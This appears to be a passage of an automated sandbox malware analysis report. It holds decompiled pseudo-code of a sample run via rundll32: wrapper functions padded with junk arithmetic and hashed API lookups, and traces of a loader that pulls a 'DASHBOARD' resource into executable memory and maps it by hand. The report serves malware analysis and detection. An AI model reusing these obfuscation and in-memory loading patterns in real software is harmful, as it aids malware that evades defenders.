                                                                                                                                    				struct HINSTANCE__* _t25;
                                                                                                                                    
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002120B9(_t20);
                                                                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                                                                    				_v24 = 0x5faaf9;
                                                                                                                                    				_v20 = 0xab22cd;
                                                                                                                                    				_v12 = 0x8e3542;
                                                                                                                                    				_v12 = _v12 >> 7;
                                                                                                                                    				_v12 = _v12 ^ 0x00089943;
                                                                                                                                    				_v8 = 0x9b967a;
                                                                                                                                    				_v8 = _v8 ^ 0x4689732a;
                                                                                                                                    				_v8 = _v8 ^ 0x4619bdd7;
                                                                                                                                    				E0021AA30(0x12d, 0x9df7cc0d, __ecx, 0xf5e9dd1e);
                                                                                                                                    				_t25 = LoadLibraryW(_a8); // executed
                                                                                                                                    				return _t25;
                                                                                                                                    			}











                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryW.KERNEL32(00000000), ref: 00215C6D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                                    • Instruction ID: 7786319d1debb7de0d4090947a8028698b444e82a9aba98e48f2b68e40cf5c22
                                                                                                                                    • Opcode Fuzzy Hash: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                                    • Instruction Fuzzy Hash: F6F0ECB5C1020CFBCB04AFE4DA06AEEBBB4EB50318F108188E91566212D3B54B58DB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E0020B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				void* _t27;
                                                                                                                                    				int _t32;
                                                                                                                                    
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002120B9(_t27);
                                                                                                                                    				_v12 = 0x6268;
                                                                                                                                    				_v12 = _v12 ^ 0x57e834c3;
                                                                                                                                    				_v12 = _v12 + 0xffff2919;
                                                                                                                                    				_v12 = _v12 + 0xffff3e3d;
                                                                                                                                    				_v12 = _v12 ^ 0x57e9dc2b;
                                                                                                                                    				_v8 = 0xa46433;
                                                                                                                                    				_v8 = _v8 + 0x98ba;
                                                                                                                                    				_v8 = _v8 | 0xc390ebe9;
                                                                                                                                    				_v8 = _v8 + 0xd5b0;
                                                                                                                                    				_v8 = _v8 ^ 0xc3bab866;
                                                                                                                                    				E0021AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
                                                                                                                                    				_t32 = lstrcmpiW(_a16, _a4); // executed
                                                                                                                                    				return _t32;
                                                                                                                                    			}








                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNEL32(EE1E6DE5,57E9DC2B), ref: 0020B2C1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1586166983-0
                                                                                                                                    • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                    • Instruction ID: f2b115aa8bb0ed309f66a3b4352c237c03b6d04b8c2c76c1b1e295a57ff40ee7
                                                                                                                                    • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                    • Instruction Fuzzy Hash: 980116B2C04608FFDF45DFD4DD468EEBBB5EB54314F208188B90566262E3728B64AB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                    			E00211E67(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				intOrPtr _v20;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				void* _t23;
                                                                                                                                    				int _t29;
                                                                                                                                    
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002120B9(_t23);
                                                                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                                                                    				_v24 = 0x62b4e9;
                                                                                                                                    				_v20 = 0xc383c4;
                                                                                                                                    				_v12 = 0x238243;
                                                                                                                                    				_v12 = _v12 * 0x67;
                                                                                                                                    				_v12 = _v12 ^ 0x0e4d658b;
                                                                                                                                    				_v8 = 0x6564d0;
                                                                                                                                    				_v8 = _v8 ^ 0x2b193590;
                                                                                                                                    				_v8 = _v8 << 0xd;
                                                                                                                                    				_v8 = _v8 ^ 0x8a2acb03;
                                                                                                                                    				E0021AA30(0x23f, 0x9df7cc0d, __ecx, 0x3185251c);
                                                                                                                                    				_t29 = CloseHandle(_a12); // executed
                                                                                                                                    				return _t29;
                                                                                                                                    			}











                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNEL32(00C383C4), ref: 00211EE1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                    • Opcode ID: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                                    • Instruction ID: 1c65cb39abdb77465f7e475fc4b5beed02b0baf7f119333a628f5320ee6cf46a
                                                                                                                                    • Opcode Fuzzy Hash: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                                    • Instruction Fuzzy Hash: 4C0124B5C10208FBCF40EFA4E94A9AEBFB5EB14308F108498E81567212D7718B68DF91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:16.1%
                                                                                                                                    Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:297
                                                                                                                                    Total number of Limit Nodes:23

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                                    • _printf.LIBCMT ref: 1001265F
                                                                                                                                    • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                                    • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                                    • _malloc.LIBCMT ref: 100127F5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 0000000B.00000002.527057151.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527138701.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527165862.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527177916.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527189497.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                                    • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                                    • API String ID: 572389289-2839844625
                                                                                                                                    • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                    • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                                    • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                    • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 61 100023c7-100023cd 57->61 58->61 59->41 62 10002472-1000248a GetProcessHeap HeapAlloc 60->62 63 10002447-10002461 VirtualAlloc 60->63 64 100023d5 61->64 65 100023cf-100023d2 61->65 67 100024ac-10002510 call 10001990 62->67 68 1000248c-100024a7 VirtualFree SetLastError 62->68 63->62 66 10002463-1000246d SetLastError 63->66 64->54 65->64 66->41 72 10002512 67->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 67->73 68->41 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 103 10002621-10002643 call 26e991 100->103 104 1000266a-10002678 100->104 102 10002687-1000268a 101->102 102->41 106 10002646-1000264d 103->106 105 1000267b 104->105 105->102 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                                    • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 0000000B.00000002.527057151.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527138701.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527165862.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527177916.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527189497.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1452528299-0
                                                                                                                                    • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                    • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                                    • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                    • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                                    APIs
                                                                                                                                    • _malloc.LIBCMT ref: 10006A9C
                                                                                                                                      • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                                      • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                                      • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 0000000B.00000002.527057151.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527138701.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527165862.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527177916.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527189497.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap_malloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 501242067-0
                                                                                                                                    • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                    • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                                    • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                    • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                                    • GlobalHandle.KERNEL32(00487B00), ref: 100208A9
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                                    • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                                    • GlobalHandle.KERNEL32(00487B00), ref: 100208DB
                                                                                                                                    • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                                    • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                                    • _memset.LIBCMT ref: 10020911
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 0000000B.00000002.527057151.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527138701.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527165862.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527177916.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527189497.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 496899490-0
                                                                                                                                    • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                    • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                                    • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                    • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • __lock.LIBCMT ref: 1002FA87
                                                                                                                                      • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                                      • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                                      • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                                    • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                                    • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                                    • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                                    • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 0000000B.00000002.527057151.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527138701.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527165862.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527177916.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527189497.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2714421763-0
                                                                                                                                    • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                    • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                                    • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                    • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                                    APIs
                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                                    • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 0000000B.00000002.527057151.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527138701.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527165862.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527177916.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527189497.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$CreateDestroy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3296620671-0
                                                                                                                                    • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                    • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                                    • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                    • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 259 10001aa0-10001aa2 249->259 260 10001aa4-10001ac9 VirtualAlloc 249->260 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 259->251 262 10001acb-10001acd 260->262 263 10001acf-10001afe call 10001810 260->263 262->251 263->248
                                                                                                                                    APIs
                                                                                                                                    • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                                    • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 0000000B.00000002.527057151.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527138701.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527165862.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527177916.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                    • Associated: 0000000B.00000002.527189497.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                    • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                                    • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                    • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%